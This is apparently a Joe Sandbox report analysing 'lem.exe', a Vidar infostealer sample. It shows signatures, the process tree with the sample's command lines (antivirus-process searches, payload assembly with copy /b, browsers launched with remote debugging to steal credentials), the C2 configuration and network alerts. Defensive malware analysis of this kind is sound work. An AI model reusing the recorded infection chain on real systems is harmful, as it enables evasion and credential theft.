Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lem.exe

Overview

General Information

Sample name:lem.exe
Analysis ID:1581175
MD5:5782bea403267e4a6ddf82263332ed59
SHA1:2c1967ed35f79ce390ee56f30fdfa6d97426c4c9
SHA256:0f9003739fc0213ff837f03f9c1ce4c835e3aab255c94d388aefb9d9b985cb2d
Tags:exeVidaruser-lontze7
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Monitors registry run keys for changes
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • lem.exe (PID: 528 cmdline: "C:\Users\user\Desktop\lem.exe" MD5: 5782BEA403267E4A6DDF82263332ED59)
    • cmd.exe (PID: 5428 cmdline: "C:\Windows\System32\cmd.exe" /c move Cohen Cohen.cmd & Cohen.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 5700 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6004 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 2796 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3636 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6200 cmdline: cmd /c md 105235 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 5960 cmdline: extrac32 /Y /E Authorization MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 5972 cmdline: findstr /V "aid" Division MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5612 cmdline: cmd /c copy /b 105235\Inf.com + Proceedings + Recovery + Webster + Sunglasses + Cultural + Tulsa + Being + Name + Silicon + Subtle 105235\Inf.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 1848 cmdline: cmd /c copy /b ..\Glad + ..\Norway + ..\Tired m MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Inf.com (PID: 1276 cmdline: Inf.com m MD5: 62D09F076E6E0240548C2F837536A46A)
        • chrome.exe (PID: 3136 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 4404 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 --field-trial-handle=2028,i,9558792887393012280,750728347199566244,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • msedge.exe (PID: 3788 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 1996 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2612 --field-trial-handle=2348,i,16825700261060781497,4542343586263828096,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 2884 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 1012 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2500 --field-trial-handle=2240,i,2906549977917240690,4367615623914022411,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • choice.exe (PID: 576 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • msedge.exe (PID: 1200 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 1960 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1956 --field-trial-handle=2176,i,2777762876112308581,5901726477067019011,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 2436 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 2372 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2712 --field-trial-handle=2060,i,14832726659220639319,15004064942317753371,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7204 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6504 --field-trial-handle=2060,i,14832726659220639319,15004064942317753371,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7216 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6820 --field-trial-handle=2060,i,14832726659220639319,15004064942317753371,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000D.00000003.2418518687.0000000001529000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      0000000D.00000003.2418360409.0000000004761000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        0000000D.00000002.3268617637.00000000000F1000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          0000000D.00000002.3268617637.00000000000F1000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0000000D.00000003.2418604420.00000000044E8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              Click to see the 9 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              13.2.Inf.com.f0000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                13.2.Inf.com.f0000.0.unpackinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
                • 0x2068c:$str01: MachineID:
                • 0x1f051:$str02: Work Dir: In memory
                • 0x206c3:$str03: [Hardware]
                • 0x20675:$str04: VideoCard:
                • 0x1fce5:$str05: [Processes]
                • 0x1fcf1:$str06: [Software]
                • 0x1f1bb:$str07: information.txt
                • 0x20398:$str08: %s\*
                • 0x203e5:$str08: %s\*
                • 0x1f5a2:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
                • 0x1fb61:$str12: UseMasterPassword
                • 0x206cf:$str13: Soft: WinSCP
                • 0x2016e:$str14: <Pass encoding="base64">
                • 0x206b2:$str15: Soft: FileZilla
                • 0x1f1ad:$str16: passwords.txt
                • 0x1fb8c:$str17: build_id
                • 0x1fc80:$str18: file_data

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Browser Started with Remote Debugging
                Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Inf.com m, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com, ParentProcessId: 1276, ParentProcessName: Inf.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 3136, ProcessName: chrome.exe

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Sigma detected: Search for Antivirus process
                Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Cohen Cohen.cmd & Cohen.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5428, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 3636, ProcessName: findstr.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T07:00:50.573984+010020442471Malware Command and Control Activity Detected188.245.216.205443192.168.2.549774TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T07:00:53.193412+010020518311Malware Command and Control Activity Detected188.245.216.205443192.168.2.549780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T07:00:48.168332+010020490871A Network Trojan was detected192.168.2.549768188.245.216.205443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T07:00:45.763263+010028593781Malware Command and Control Activity Detected192.168.2.549762188.245.216.205443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: https://bijutr.shop/e3fAvira URL Cloud: Label: malware
                Source: https://bijutr.shop/bxAvira URL Cloud: Label: malware
                Found malware configuration
                Source: 0000000D.00000003.2418360409.0000000004761000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
                Multi AV Scanner detection for submitted file
                Source: lem.exeVirustotal: Detection: 11%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 85.4% probability
                Source: lem.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49959 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49750 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.245.216.205:443 -> 192.168.2.5:49756 version: TLS 1.2
                Source: lem.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cryptosetup.pdbGCTL source: Inf.com, 0000000D.00000002.3274650017.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, 68QI5X.13.dr
                Source: Binary string: cryptosetup.pdb source: Inf.com, 0000000D.00000002.3274650017.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, 68QI5X.13.dr
                Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A7DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_00A7DC54
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A8A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00A8A087
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A8A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00A8A1E2
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A7E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,13_2_00A7E472
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A8A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,13_2_00A8A570
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A866DC FindFirstFileW,FindNextFileW,FindClose,13_2_00A866DC
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A4C622 FindFirstFileExW,13_2_00A4C622
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A873D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,13_2_00A873D4
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A87333 FindFirstFileW,FindClose,13_2_00A87333
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A7D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_00A7D921
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
                Source: chrome.exeMemory has grown: Private usage: 1MB later: 39MB

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.5:49768 -> 188.245.216.205:443
                Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.5:49762 -> 188.245.216.205:443
                Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 188.245.216.205:443 -> 192.168.2.5:49780
                Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 188.245.216.205:443 -> 192.168.2.5:49774
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199809363512
                Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 23.44.201.19 23.44.201.19
                Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
                Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49959 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
                Source: unknownTCP traffic detected without corresponding DNS query: 13.89.178.27
                Source: unknownTCP traffic detected without corresponding DNS query: 13.89.178.27
                Source: unknownTCP traffic detected without corresponding DNS query: 13.89.178.27
                Source: unknownTCP traffic detected without corresponding DNS query: 18.164.116.98
                Source: unknownTCP traffic detected without corresponding DNS query: 18.164.116.98
                Source: unknownTCP traffic detected without corresponding DNS query: 18.164.116.98
                Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.19
                Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.19
                Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.19
                Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.19
                Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.19
                Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.19
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
                Source: unknownTCP traffic detected without corresponding DNS query: 13.89.178.27
                Source: unknownTCP traffic detected without corresponding DNS query: 13.89.178.27
                Source: unknownTCP traffic detected without corresponding DNS query: 13.89.178.27
                Source: unknownTCP traffic detected without corresponding DNS query: 13.89.178.27
                Source: unknownTCP traffic detected without corresponding DNS query: 13.89.178.27
                Source: unknownTCP traffic detected without corresponding DNS query: 13.89.178.27
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A8D889 InternetReadFile,SetEvent,GetLastError,SetEvent,13_2_00A8D889
                Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: bijutr.shopConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /b?rn=1735279295840&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3918B198F66063F3328CA4FAF7676296&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /b2?rn=1735279295840&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3918B198F66063F3328CA4FAF7676296&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1AE10fc6589f9ad55d15d371735279297; XID=1AE10fc6589f9ad55d15d371735279297
